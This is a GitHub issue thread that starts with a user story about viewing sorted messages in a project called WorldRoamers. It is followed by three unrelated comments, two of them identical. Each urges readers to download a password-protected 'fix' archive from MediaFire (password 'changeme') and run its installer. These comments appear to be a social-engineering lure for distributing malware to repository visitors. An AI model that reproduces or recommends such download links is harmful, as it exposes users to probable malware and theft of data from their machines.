### ISSUE TITLE
USER STORY: View Messages

### ISSUE THREAD

**Issue by Joshuadrp** [Joshuadrp/WorldRoamers#12]
**As a** registered user, **I want** to access messages page and see messages sorted by posts, **So that** I can manage my messages and reply accordingly.

---

### Acceptance Criteria

- Given logged user, click and open messages page.
- Then if user has messages, they will be sorted by date.
- When no messages, feedback will be provided.

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by scppuna** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
